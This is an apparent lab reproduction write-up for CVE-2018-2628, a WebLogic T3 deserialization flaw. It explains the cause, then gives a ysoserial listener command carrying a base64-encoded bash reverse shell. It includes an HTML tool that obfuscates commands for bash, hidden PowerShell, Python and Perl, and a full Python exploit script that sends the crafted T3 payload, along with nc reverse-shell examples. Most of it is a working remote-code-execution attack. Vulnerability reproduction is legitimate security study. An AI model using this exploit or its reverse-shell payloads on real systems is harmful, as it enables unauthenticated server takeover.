Oracle's April 2018 Critical Patch Update fixed a deserialization vulnerability in the WebLogic Server WLS Core Components (CVE-2018-2628). It is triggered over the T3 protocol and lets an unauthenticated remote attacker execute arbitrary commands on the server.

Cause of the vulnerability:

The target's T3 service deserializes attacker-supplied data with readObject. WebLogic guards that call with a class blacklist, but the blacklist does not cover the RMI proxy objects that ysoserial's JRMPClient payloads wrap (a java.rmi.registry.Registry or java.rmi.activation.Activator reference). When such an object is deserialized, the JRMP client inside the target connects back to the attacker's JRMP server and deserializes whatever it returns; at that point an ordinary CommonsCollections gadget chain runs with no filter in the way, and the attacker gets remote code execution. The attack is delivered over T3: the port the WebLogic console listens on (7001 by default) also serves T3 by default, so anyone who can reach it can send a crafted T3 message and take over the server.

Reproduction

Start the environment

Start a JRMP server with ysoserial. The command is executed on the target through Runtime.exec, which splits on whitespace and does not invoke a shell, so a reverse shell that uses pipes or redirections has to be encoded:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk2LjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}"

The following HTML page does the encoding (paste the raw command, copy the output):

<!DOCTYPE html>
<html>
<head><title>java runtime exec usage...</title>
</head>
<body><p>Input type:
<input type="radio" id="bash" name="option" value="bash" onclick="processInput();" checked=""><label for="bash">Bash</label>
<input type="radio" id="powershell" name="option" value="powershell" onclick="processInput();"><label for="powershell">PowerShell</label>
<input type="radio" id="python" name="option" value="python" onclick="processInput();"><label for="python">Python</label>
<input type="radio" id="perl" name="option" value="perl" onclick="processInput();"><label for="perl">Perl</label></p><p><textarea rows="10" style="width: 100%; box-sizing: border-box;" id="input" placeholder="Type Bash here..."></textarea>
<textarea rows="5" style="width: 100%; box-sizing: border-box;" id="output" onclick="this.focus(); this.select();" readonly=""></textarea></p>
<script>
var taInput = document.querySelector('textarea#input');
var taOutput = document.querySelector('textarea#output');
function processInput() {
  var option = document.querySelector('input[name="option"]:checked').value;
  switch (option) {
    case 'bash':
      taInput.placeholder = 'Type Bash here...';
      // bash -c gets one whitespace-free argument; brace expansion rebuilds the pipeline
      taOutput.value = 'bash -c {echo,' + btoa(taInput.value) + '}|{base64,-d}|{bash,-i}';
      break;
    case 'powershell':
      taInput.placeholder = 'Type PowerShell here...';
      // -Enc expects base64 of UTF-16LE, so a NUL byte follows each character
      var poshInput = '';
      for (var i = 0; i < taInput.value.length; i++) { poshInput += taInput.value[i] + unescape("%00"); }
      taOutput.value = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ' + btoa(poshInput);
      break;
    case 'python':
      taInput.placeholder = 'Type Python here...';
      // str.decode('base64') is Python 2 only
      taOutput.value = "python -c exec('" + btoa(taInput.value) + "'.decode('base64'))";
      break;
    case 'perl':
      taInput.placeholder = 'Type Perl here...';
      taOutput.value = "perl -MMIME::Base64 -e eval(decode_base64('" + btoa(taInput.value) + "'))";
      break;
    default:
      taOutput.value = '';
  }
  if (!taInput.value) taOutput.value = '';
}
taInput.addEventListener('input', processInput, false);
</script></body>
</html>

Start the listener first (the encoded payload above connects back to 192.168.96.1:1234):

Then use exploit.py to send the crafted T3 message to the target WebLogic (http://your-ip:7001).

The script is published at:

https://www.exploit-db.com/exploits/44553

Source:

# -*- coding: utf-8 -*-
# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)
#
# IMPORTANT: Is provided only for educational or information purposes.
#
# Credit: Thanks by Liao Xinxi of NSFOCUS Security Team
# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
#
# How to exploit:
# 1. run below command on JRMPListener host
#    1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
#    2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
#       e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'
# 2. start a listener on attacker host
#    e.g. nc -nlvp 4040
# 3. run this script on attacker host
#    1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
#    2) python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
#       e.g.
#           a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)
#           b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)
#
# Note: written for Python 2 (str.decode('hex'), str-based sockets, integer division).

from __future__ import print_function
import binascii
import os
import socket
import sys
import time


def generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
    # generates ysoserial payload: a JRMPClient object that makes the target
    # connect back to the JRMPListener when it is deserialized
    command = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)
    print("command: " + command)
    os.system(command)
    bin_file = open('payload.out', 'rb').read()
    return binascii.hexlify(bin_file)


def t3_handshake(sock, server_addr):
    sock.connect(server_addr)
    # plain-text form: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print('handshake successful')


def build_t3_request_object(sock, port):
    # the hex bodies of data1 and the start of data2 are not reproduced in this copy;
    # the full script is at the exploit-db link above
    data1 = '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'
    # the victim port is embedded in the serialized JVMID as a 2-byte big-endian value
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1, data2, data3, data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print('send request payload successful,recv length:%d' % (len(sock.recv(2048))))


def send_payload_objdata(sock, data):
    # T3 message header (hex not reproduced in this copy), then the serialized
    # JRMPClient object, then the trailing ImmutableServiceContext/MethodDescriptor objects
    payload = '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'
    payload += data
    payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    # 4-byte big-endian length prefix that counts itself
    payload = '%s%s' % ('{:08x}'.format(len(payload) / 2 + 4), payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception:
        pass
    return res


def exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(65)
    server_addr = (dip, dport)
    t3_handshake(sock, server_addr)
    build_t3_request_object(sock, dport)
    payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)
    print("payload: " + payload)
    rs = send_payload_objdata(sock, payload)
    print('response: ' + rs)
    print('exploit completed!')


if __name__ == "__main__":
    # check for args, print usage if incorrect
    if len(sys.argv) != 7:
        print('\nUsage:\nexploit.py [victim ip] [victim port] [path to ysoserial] '
              '[JRMPListener ip] [JRMPListener port] [JRMPClient]\n')
        sys.exit()
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    path_ysoserial = sys.argv[3]
    jrmp_listener_ip = sys.argv[4]
    jrmp_listener_port = sys.argv[5]
    jrmp_client = sys.argv[6]
    exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)

python exploit.py 192.168.96.168 7001 "C:/Users/11989/Desktop/渗透/java反序列化/ysoserial.jar" 192.168.96.1 8888 JRMPClient   // the third argument is the local path to ysoserial.jar; 192.168.96.1:8888 is the JRMPListener started above

Reverse shell received:

References:

  • Oracle Critical Patch Update - April 2018
  • CVE-2018-2628: simple reproduction and analysis
  • GitHub - tdy218/ysoserial-cve-2018-2628: Some codes for bypassing Oracle WebLogic CVE-2018-2628 patch
